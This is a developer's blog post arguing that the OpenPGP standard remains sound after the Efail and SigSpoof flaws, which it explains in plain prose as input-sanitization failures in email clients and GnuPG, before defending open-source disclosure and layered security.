I consider OpenPGP as a blessing. It brings to the common developer a cryptography standard that leverages a series of proven techniques and algorithms. It provides a solid way of encrypting text or bytes, and securely exchange data.
Yet two critical flaws have recently surfaced in the space of a month. Efail gave the attacker access to the encrypted content, and was considered so serious that the Electronic Frontier Foundation itself advised to stop using PGP-based email encryption. The SigSpoof flaw, on the other hand, opened a way for attackers to spoof the signature of the encrypted message’s sender.
These two discoveries are obviously not good news. Does it mean that you cannot trust OpenPGP anymore?
Mens sana in corpore sano
While building experience as a coder, I gradually became conscious of security concerns. I now try to protect applications as good as I can: decent authentication, role-based authorization, CORS, CSRF, etc. I’m certainly no expert but I try to “do the right thing“, as they say.
One important security practice is input validation. It is one of the causes for cross-site scripting, which attackers keep on leveraging according to OWASP’s report on Top Ten Risks in 2017. As a matter of fact, the sanitization problem goes back to 2004, at least!
If we take a closer look to those PGP vulnerabilities, we can see that OpenPGP is not really to blame.
Efail relies on the way encrypted email clients’ render HTML content. Graham Cluley does a great job at explaining this. Essentially, the attacker adds an unclosed image tag right before the encrypted message. That image tag contains the attacker’s extraction URL address. The client decrypts the PGP content, then renders the email’s HTML. That unclosed image tag calls the extraction URL, to which the unencrypted message is concatenated. This effectively sends the message to the attacker’s website.
OpenPGP authorizes the inclusion of the unencrypted file’s file name in a signed or encrypted message. GnuPG, on decrypting the message, can display a notice that includes that file name information. But it doesn’t sanitize it! So an attacker can use that to inject control characters or change parts of the output.
Now, programs such as Enigmail can ask GnuPG to generate “status messages“. They can then parse those to display valuable information… such as a signature’s validity. But an attacker could change that signature information by injecting the right characters in the notice’s file name. Essentially, this is how SigSpoof is possible.
OpenPGP is not broken
Relax! The good news is: the OpenPGP standard is not broken. The bad news? The coverage given to these vulnerabilities is making a bad name for OpenPGP, even if the standard or its algorithms are not to blame.
In other words: the fact that input sanitization has caused these flaws does not matter. At the moment, many may believe that the encryption standard is unreliable. Just have a look at these comments…
One friend of mine put it this way: use OpenPGP because it’s secure. Just don’t use it that as a marketing argument…
Open Source saved the day
Some of the criticisms I’ve read blame the development model: “Based on those two vulnerabilities, it looks like Open Source is no better than closed source”.
Well, I find that a tough sell: I’d rather know there’s a problem, instead of being unaware of it! With Open Source, developers expose issues and publish them for all to see. That may give a bad impression, but it also means that project contributors can fix those bugs as fast as possible. With closed source only the software owner knows and decides if and when it is worth fixing. This implies that you need to trust that vendor!
Take Toyota for example. In 2014, the car making company discloses an issue with their braking system and recalls 1.6 million vehicles. People found that worrying. I thought it was reassuring: had I owned a Toyota, would I have been happier to have those brakes fixed or to wait for them to eventually fail at the worst possible moment?
Security is hard!
Let me repeat this: security is hard.
I would not dare blaming anyone for those vulnerabilities. Programmers work extra unpaid hours to build those Open Source applications, so they understandably make mistakes. I myself plead guilty of countless stupid errors and omissions in my code!
But we can adopt a set of reasonable approaches to secure our applications. We can implement multiple security layers, in case one of them would fail. We can assume all of those layers can fail and take measures to limit how much data our software leaks.
And of course we can keep our security knowledge updated by reading security blogs and bookmarking that OWASP website 😉